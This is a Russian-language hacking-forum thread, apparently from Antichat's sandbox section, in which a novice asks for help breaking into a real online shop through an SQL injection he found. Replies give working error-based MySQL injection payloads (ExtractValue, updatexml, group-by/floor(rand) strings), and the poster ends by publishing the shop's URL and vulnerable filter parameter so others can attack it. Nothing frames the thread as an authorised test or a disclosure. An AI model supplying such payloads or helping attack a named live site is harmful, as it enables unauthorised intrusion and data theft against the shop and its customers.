HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2015, 05:07
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
С нами: 7752566

Репутация: 0
По умолчанию

Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.



Вообщем что только не придумывал, и union прописывал и т.д.

Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.



Какие еще могут быть варианты для взлома?
 
Ответить с цитированием

  #2  
Старый 26.08.2015, 06:37
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Пробуйте error based вектор. например:

'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

или

'-updatexml(0,repeat(version(),2),2)#
 
Ответить с цитированием

  #3  
Старый 26.08.2015, 11:13
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
 
Ответить с цитированием

  #4  
Старый 27.08.2015, 02:17
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
С нами: 7752566

Репутация: 0
По умолчанию

Цитата:
Сообщение от SaNDER  

Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.

----------------------------------
 
Ответить с цитированием

  #5  
Старый 27.08.2015, 02:18
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
С нами: 7752566

Репутация: 0
По умолчанию

Цитата:
Сообщение от Br@!ns  

Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Не помогло....
 
Ответить с цитированием

  #6  
Старый 27.08.2015, 16:37
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23

в ошибке увидите версию
 
Ответить с цитированием

  #7  
Старый 27.08.2015, 17:43
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
Тоже не пашет .
 
Ответить с цитированием

  #8  
Старый 27.08.2015, 17:45
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от yarbabin  

"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
а какого типа эта инъекция, если можно манукльчик ))
 
Ответить с цитированием

  #9  
Старый 27.08.2015, 17:45
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от BabaDook  

а какого типа эта инъекция, если можно манукльчик ))
error based
 
Ответить с цитированием

  #10  
Старый 28.08.2015, 02:22
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
С нами: 7752566

Репутация: 0
По умолчанию

Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/

Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.